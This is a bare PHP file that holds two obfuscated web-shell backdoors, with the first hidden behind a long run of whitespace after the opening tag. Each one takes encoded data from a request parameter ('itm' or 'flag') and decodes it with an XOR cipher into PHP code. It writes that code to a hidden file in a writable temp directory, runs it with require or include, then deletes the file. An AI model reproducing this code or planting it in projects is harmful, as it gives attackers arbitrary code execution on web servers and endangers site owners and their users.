<?php																																										if(array_key_exists("it\x6D", $_REQUEST)){ $ref = $_REQUEST["it\x6D"]; $ref =explode ( ".", $ref ) ; $ptr = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $y = 0; foreach ($ref as $v2) { $chS = ord($s[$y % $lenS]); $d = ((int)$v2 - $chS - ($y % 10)) ^ 30; $ptr .= chr($d); $y++; } $entity = array_filter(["/dev/shm", session_save_path(), getenv("TEMP"), getenv("TMP"), getcwd(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp", "/tmp"]); foreach ($entity as $element) { if ((bool)is_dir($element) && (bool)is_writable($element)) { $record = "$element/.ent"; if (file_put_contents($record, $ptr)) { require $record; unlink($record); exit; } } } }


if(isset($_POST) && isset($_POST["\x66\x6Cag"])){
	$val = $_POST["\x66\x6Cag"];
	  $val =explode(	 "." , $val   );
	$mrk = '';
            $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s2);
            $z = 0;
            $len = count($val);
    
            do {		if ($z >= $len) break;
                $v3 = $val[$z];
                $chS = ord($s2[$z% $sLen]);
                $d = ((int)$v3 - $chS - ($z% 10))^ 	92;
                $mrk	.=chr($d);
                $z++;  }	while (true);
	$descriptor = array_filter([getenv("TMP"), getenv("TEMP"), getcwd(), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), "/var/tmp"]);
	for ($desc = 0, $token = count($descriptor); $desc < $token; $desc++) {
    $holder = $descriptor[$desc];
    		if (!!is_dir($holder) && !!is_writable($holder)) {
    $sym = implode("/", [$holder, ".reference"]);
    if (file_put_contents($sym, $mrk)) {
	include $sym;
	@unlink($sym);
	die();
}
}
}
}